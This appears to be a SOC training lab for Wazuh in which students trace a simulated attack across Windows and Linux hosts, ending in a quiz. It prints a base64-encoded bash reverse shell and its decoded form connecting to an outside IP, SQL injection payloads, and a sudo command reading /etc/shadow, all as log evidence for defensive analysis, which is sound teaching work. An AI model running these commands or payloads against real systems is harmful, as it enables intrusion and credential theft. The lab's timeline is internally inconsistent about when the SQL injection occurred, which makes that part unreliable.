Hands-on LabBeginner·~80 min·Includes challenge

Lab 2.1 — Log Source Deep Dive

Deep-dive into 5 critical events: decode subStatus codes, enrich IPs on AbuseIPDB, decode base64 reverse shells, and write analyst notes that connect events into a multi-stage attack narrative.

Tools needed:Wazuh DashboardAbuseIPDBCyberChefMITRE ATT&CK Navigator

What You'll Learn

  • Perform field-level forensic analysis on 5 critical event types inside Wazuh
  • Decode Windows subStatus codes and identify attacker enumeration patterns
  • Use external enrichment tools (AbuseIPDB, CyberChef, MITRE ATT&CK) to add context to raw alerts
  • Trace a multi-stage attack across two systems by correlating timestamps and IPs
  • Write structured analyst notes that connect individual events into an attack narrative

Lab Overview

DetailValue
Lab Profilelab-wazuh
ContainersWazuh Manager, Wazuh Indexer, Wazuh Dashboard, Wazuh Agent
Estimated Time75–90 minutes
DifficultyIntermediate
Browser AccessWazuh Dashboard + external tools in separate tabs
Pre-Loaded Data500+ events including a multi-stage attack scenario
DeliverableCompleted Investigation Worksheet with analyst notes for 5 events

From Log Reader to Analyst. In Module 1, you learned to navigate Wazuh, identify log sources, and map ATT&CK techniques. Now it's time to think like an analyst. Instead of just finding events, you'll investigate them — extracting critical fields, enriching IPs against threat intelligence, decoding obfuscated payloads, and connecting dots across systems to tell the story of an attack.

Before You Begin: Tools Setup

You'll need the Wazuh Dashboard (opens when you start the lab) plus these free browser-based tools in separate tabs:

ToolURLPurpose
AbuseIPDBabuseipdb.comIP reputation lookup — check if attacker IPs are known malicious
CyberChefgchq.github.io/CyberChefDecode base64, extract strings, transform data
MITRE ATT&CKattack.mitre.orgLook up technique IDs to understand attacker behavior
💡

Real SOC Parallel. Production SOC analysts routinely pivot between their SIEM, threat intel platforms (MISP, VirusTotal, AbuseIPDB), and reference frameworks (MITRE ATT&CK). This lab trains that exact workflow.

The Scenario

Your Wazuh environment contains events from a real attack scenario spanning two systems. An attacker (or group) used multiple IPs and techniques to compromise your network over approximately 1 hour 18 minutes. Your job is to investigate 5 key events, extract forensic details, enrich them with external intelligence, and connect them into a single attack narrative.

About Timestamps. The attack events in your lab are timestamped relative to when you started the lab — they'll appear within the last few hours. The relative gaps between events are preserved (the brute force starts first, the reverse shell is last, with about 78 minutes between them). Use the rule.id and source IP fields shown below to find each event, then note the actual timestamps you observe.

Attack Timeline

Part 1: Investigation Exercise — Windows Failed Logons (Event 4625)

Step 1: Find the Events

In the Wazuh Dashboard, navigate to Security Events and search for:

rule.id: 18152

You should find multiple Windows 4625 (failed logon) events on WIN-SERVER-01 from the IP 91.234.99.87.

Step 2: Extract Key Fields

Click on one of the 4625 events and expand it. Use the Field Extraction Worksheet below to record the following fields:

Field Extraction Worksheet

For the Windows 4625 event, extract:

FieldYour Finding
data.win.eventdata.targetUserName(which account was targeted?)
data.win.eventdata.targetDomainName(which domain?)
data.win.eventdata.logonType(what type of remote access?)
data.win.eventdata.ipAddress(attacker IP)
data.win.eventdata.status(overall error code)
data.win.eventdata.subStatus(specific failure reason)

Step 3: Decode the subStatus

The subStatus field is where the real forensics happens. Windows encodes the specific failure reason:

subStatus CodeMeaningAnalyst Implication
0xc000006aWrong passwordAttacker knows a valid username — they're close
0xc0000064No such userAttacker is guessing usernames — less targeted
0xc0000072Account disabledAttacker found an account but it's locked down
0xc0000234Account locked outPrevious brute force triggered lockout policy

Question for your notes: What subStatus code do you see in these events? What does it tell you about how close the attacker was to success?

Step 4: Enrich the IP

Open AbuseIPDB in a new tab and search for 91.234.99.87.

Record in your notes:

  • Confidence of Abuse Score: What percentage?
  • Country: Where is this IP geolocated?
  • Reports: How many reports exist? What categories?
  • ISP: Who owns this IP range?

Step 5: Map to ATT&CK

The Wazuh alert already tags this as T1110 (Brute Force). Open attack.mitre.org/techniques/T1110 and record:

  • Which sub-technique best matches? (T1110.001 Password Guessing? T1110.003 Password Spraying?)
  • What mitigations does MITRE recommend?

Analyst Note Template — Event 1:

EVENT: Windows 4625 (Failed Logon)
AGENT: WIN-SERVER-01 (10.0.2.20)
TIME: [note the timestamps from your lab]
ATTACKER IP: 91.234.99.87
TARGET ACCOUNT: [your finding]
SUBSTATUS: [your finding] → Meaning: [your interpretation]
ABUSEIPDB SCORE: [your finding]
ATT&CK TECHNIQUE: T1110 — [sub-technique]
VERDICT: [Benign / Suspicious / Malicious] — [your reasoning]

Part 2: Investigation Exercise — Successful Logon After Failures (Event 4624)

Step 1: Find the Event

Search Wazuh for:

rule.id: 60106

This rule fires when a successful logon follows previous failures — one of the most important patterns in SOC work. Find the event from 91.234.99.87 — it occurs roughly 22 minutes after the failed logon attempts.

Step 2: Extract Key Fields

FieldYour Finding
data.win.eventdata.targetUserName(which account succeeded?)
data.win.eventdata.logonType(how did they log in?)
data.win.eventdata.ipAddress(same attacker IP?)
data.win.eventdata.workstationName(what machine connected?)

Step 3: Analyze the Workstation Name

The workstationName field reveals the hostname of the connecting machine. In your lab, you should see EVIL-PC.

Critical thinking questions:

  • Is "EVIL-PC" a name that belongs to your domain (CYBERBLUE)?
  • What does a non-domain workstation name tell you?
  • How much time elapsed between the last failed logon and this success?

Step 4: Compare with Legitimate Logons

Search for other 4624 events to see what normal looks like:

data.win.system.eventID: 4624

Compare:

AttributeLegitimate LogonSuspicious Logon
Source IPInternal (10.x.x.x)91.234.99.87 (external)
WorkstationDomain-joined namesEVIL-PC
Time PatternBusiness hoursShortly after brute force attempts

Analyst Note Template — Event 2:

EVENT: Windows 4624 (Logon Success after Failures)
RULE: 60106 — Logon success after previous failures
AGENT: WIN-SERVER-01 (10.0.2.20)
TIME: [your finding] (~22 minutes after brute force started)
ATTACKER IP: 91.234.99.87 (same as failed logons)
WORKSTATION: [your finding]
ACCOUNT: [your finding]
CORRELATION: Failed → Success pattern confirms brute force succeeded
VERDICT: [your assessment]

Part 3: Investigation Exercise — Web Shell Sudo Escalation

Step 1: Find the Events

Search Wazuh for sudo events from the web service account:

data.srcuser: www-data AND rule.groups: sudo

You should find three escalation events on linux-web-01, each progressively more dangerous.

Step 2: Trace the Escalation Chain

Document each command in chronological order:

OrderRuleCommandSeverity
1st (earliest)5401 (First time sudo)/usr/bin/idReconnaissance — testing access
2nd (~2 min later)5402 (Sudo to ROOT)/bin/bash -c 'cat /etc/shadow'Credential theft — reading password hashes
3rd (~7 min after 1st)5402 (Sudo to ROOT)/bin/bashFull shell — complete system control

Step 3: Understand Why This Is Critical

www-data is the Apache web server process account. It should never execute sudo. This pattern reveals:

  1. The attacker gained code execution through the web application (likely via the SQL injection you'll investigate next)
  2. They discovered the web server has overly permissive sudo rights
  3. They escalated from a limited service account to full root access in 7 minutes

Step 4: Map to ATT&CK

Look up T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching) on MITRE ATT&CK:

  • What procedure examples match this behavior?
  • The /etc/shadow read maps to which additional technique? (Hint: T1003 — OS Credential Dumping)

Analyst Note Template — Event 3:

EVENT: Sudo Escalation Chain (www-data → root)
AGENT: linux-web-01 (10.0.2.15)
TIME: [note timestamps from your lab] (spanning ~7 minutes)
SOURCE USER: www-data (web service account)
COMMANDS: [list all three]
ESCALATION PATH: Service account → id → shadow read → full shell
ATT&CK: T1548.003 (Sudo Abuse), T1003 (Credential Dumping)
ROOT CAUSE: [why could www-data sudo? — misconfigured sudoers]
VERDICT: [your assessment]

Part 4: Investigation Exercise — SQL Injection Attack

Step 1: Find the Events

Search Wazuh for:

rule.id: 31103

You should find two SQL injection events from IP 203.0.113.50 targeting linux-web-01.

Step 2: Analyze the Payloads

Expand each event and examine the full_log field carefully:

Event 1 — GET-based injection:

203.0.113.50 - - [<date/time in your lab>] "GET /api/users?id=1'+OR+'1'='1 HTTP/1.1" 400 0 "-" "sqlmap/1.7.2"

Event 2 — POST-based injection (occurs ~2 minutes after Event 1):

203.0.113.50 - - [<date/time in your lab>] "POST /api/login HTTP/1.1" 400 0 "-" "sqlmap/1.7.2" "admin' UNION SELECT password FROM users--"

Step 3: Extract Forensic Details

DetailEvent 1Event 2
MethodGETPOST
Target Endpoint/api/users/api/login
Payload1'+OR+'1'='1 (boolean-based)admin' UNION SELECT password FROM users-- (UNION-based)
Toolsqlmap/1.7.2sqlmap/1.7.2
HTTP Response400400

Step 4: Understand the Attack Tool

The User-Agent reveals the attacker used sqlmap — an open-source automated SQL injection tool. Key observations:

  • Version 1.7.2 is relatively recent
  • The attacker progressed from boolean-based to UNION-based injection (escalating techniques)
  • The POST payload targets the login endpoint and attempts to dump the password column
  • Both requests returned 400, but the attacker may have succeeded with other requests not captured

Step 5: Connect to the Web Shell

Timeline correlation: The SQL injection events occur just minutes before the www-data sudo to /bin/bash. Compare the timestamps — this tight sequence suggests the SQL injection was the initial access vector that led to code execution on the web server.

Analyst Note Template — Event 4:

EVENT: SQL Injection Attempt (Level 12)
AGENT: linux-web-01 (10.0.2.15)
TIME: [note timestamps from your lab] (two events ~2 min apart)
ATTACKER IP: 203.0.113.50
TOOL: sqlmap/1.7.2 (automated)
TARGETS: /api/users (GET), /api/login (POST)
PAYLOADS: Boolean-based OR, UNION SELECT password dump
ATT&CK: T1190 (Exploit Public-Facing Application)
CORRELATION: Timing aligns with www-data escalation → likely initial access vector
VERDICT: [your assessment]

Part 5: Investigation Exercise — Base64 Encoded Reverse Shell

Step 1: Find the Event

Search Wazuh for:

rule.id: 100002

Find the event on linux-web-01 — it is the last event chronologically in the attack sequence, occurring roughly 12 minutes after the sudo escalation.

Step 2: Extract the Encoded Command

In the data.command or full_log field, you'll find:

echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xODUuMjIwLjEwMS40Mi80NDQ1IDA+JjE=' | base64 -d | bash

Step 3: Decode with CyberChef

Open CyberChef and perform these steps:

  1. Paste the base64 string: YmFzaCAtaSA+JiAvZGV2L3RjcC8xODUuMjIwLjEwMS40Mi80NDQ1IDA+JjE=
  2. Add the "From Base64" recipe
  3. The decoded output reveals:
bash -i >& /dev/tcp/185.220.101.42/4445 0>&1

Step 4: Analyze the Reverse Shell

Break down the command:

ComponentMeaning
bash -iInteractive bash shell
>&Redirect stdout and stderr
/dev/tcp/185.220.101.42/4445TCP connection to 185.220.101.42 on port 4445
0>&1Redirect stdin to the same connection

This is a classic bash reverse shell. The compromised server initiates an outbound connection to the attacker, giving them an interactive shell.

Step 5: Connect the IPs

Critical discovery: The reverse shell connects to 185.220.101.42 — the same IP that performed the SSH brute force attack at the start of the attack timeline. This confirms:

  • The SSH brute force and the reverse shell are part of the same operation
  • The attacker used multiple IPs for different attack phases
  • 185.220.101.42 is both a scanning source and a C2 (Command & Control) server

Step 6: Enrich the C2 IP

Search AbuseIPDB for 185.220.101.42 and record:

  • Abuse confidence score
  • Known associations (Tor exit node? Botnet C2?)
  • Country and ISP

Analyst Note Template — Event 5:

EVENT: Base64 Encoded Reverse Shell
AGENT: linux-web-01 (10.0.2.15)
TIME: [note timestamp from your lab] (final event in attack sequence)
EXECUTED BY: root (via www-data escalation)
ENCODED PAYLOAD: YmFzaCAtaSA+JiAvZGV2L3RjcC8xODUuMjIwLjEwMS40Mi80NDQ1IDA+JjE=
DECODED: bash -i >& /dev/tcp/185.220.101.42/4445 0>&1
C2 ADDRESS: 185.220.101.42:4445
ABUSEIPDB SCORE: [your finding]
IP CORRELATION: Same IP as SSH brute force (earliest events) — confirms single actor
ATT&CK: T1059.004 (Unix Shell), T1027 (Obfuscated Files)
VERDICT: [your assessment]

Part 6: Build the Attack Narrative

Now that you've investigated all 5 events, it's time to connect them into a unified attack story.

Multi-Stage Attack Narrative

The Complete Timeline

Relative TimeEventAgentATT&CK Phase
T+0 minSSH brute force (12 attempts, 8 usernames)linux-web-01Credential Access (T1110)
T+15 minWindows logon failures (subStatus: wrong password)WIN-SERVER-01Credential Access (T1110)
T+37 minWindows logon success (workstation: EVIL-PC)WIN-SERVER-01Initial Access (T1078)
T+63 minWeb shell file added (wp-config.bak.php)linux-web-01Persistence (T1505.003)
T+66 to T+73 minwww-data sudo chain (id → shadow → bash)linux-web-01Privilege Escalation (T1548.003)
T+71 to T+73 minSQL injection with sqlmaplinux-web-01Initial Access (T1190)
T+78 minReverse shell to 185.220.101.42:4445linux-web-01Command & Control (T1059.004)

Write Your Final Analyst Summary

Using the notes from all 5 exercises, write a summary that answers:

  1. How many attacker IPs were involved? (List each and its role)
  2. Are they the same threat actor? (What evidence connects them?)
  3. What was the kill chain? (Map to MITRE ATT&CK phases)
  4. What is the highest severity? (Justify your rating)
  5. What are your containment recommendations? (Immediate actions)

Model Analyst Summary:

Three IPs (185.220.101.42, 91.234.99.87, 203.0.113.50) conducted a coordinated multi-stage attack against both Linux and Windows systems. The SSH brute force from 185.220.101.42 served as initial reconnaissance. The Windows brute force from 91.234.99.87 achieved account compromise (4624 from EVIL-PC). SQL injection from 203.0.113.50 exploited the web application, leading to web shell deployment and sudo escalation. The final reverse shell connected back to 185.220.101.42, confirming this IP as the C2 server and linking all phases to a single threat actor. Severity: Critical. Immediate containment: block all three IPs at the firewall, rotate the Administrator password, revoke www-data sudo privileges, and take linux-web-01 offline for forensic imaging.

Deliverable Checklist

Before completing the lab, ensure you have:

  • Event 1 Notes: Windows 4625 with subStatus decoded and IP enriched
  • Event 2 Notes: Windows 4624 with workstation name analysis and comparison to legitimate logons
  • Event 3 Notes: Full sudo escalation chain documented with ATT&CK mapping
  • Event 4 Notes: SQL injection payloads analyzed with tool identification
  • Event 5 Notes: Base64 decoded with CyberChef, C2 IP enriched
  • Attack Narrative: Complete timeline connecting all 5 events with verdict and recommendations

Lab Challenge: Log Source Deep Dive

10 questions · 70% to pass

1

In the Windows 4625 events from 91.234.99.87, the subStatus code is 0xc000006a. What does this specific code reveal about the attacker's progress?

2

What is the workstationName in the Windows 4624 (successful logon) event from 91.234.99.87, and why is this field forensically significant?

3

When decoding the base64 string YmFzaCAtaSA+JiAvZGV2L3RjcC8xODUuMjIwLjEwMS40Mi80NDQ1IDA+JjE= in CyberChef, what C2 port does the reverse shell connect to?

4

The SQL injection events reveal the attacker used an automated tool. What User-Agent string identifies this tool, and what version is it?

5

In the www-data sudo escalation chain, what is the SECOND command executed and what credential data does it target?

6

What critical evidence links the SSH brute force at the start of the attack to the reverse shell at the end?

7

The Windows 4624 event has logonType 3. In the context of this investigation, what does Logon Type 3 mean and why does it matter?

8

In the SQL injection events, the attacker progressed from a GET request to a POST request. What does the POST payload 'admin\' UNION SELECT password FROM users--' specifically attempt to do?

9

How many distinct external attacker IPs are involved in this multi-stage attack? List them by their roles.

10

Based on the complete attack timeline, what is the total elapsed time from the first attack event (SSH brute force) to the final event (reverse shell), and which IMMEDIATE containment action should an analyst prioritize FIRST?

0/10 answered

Next Lab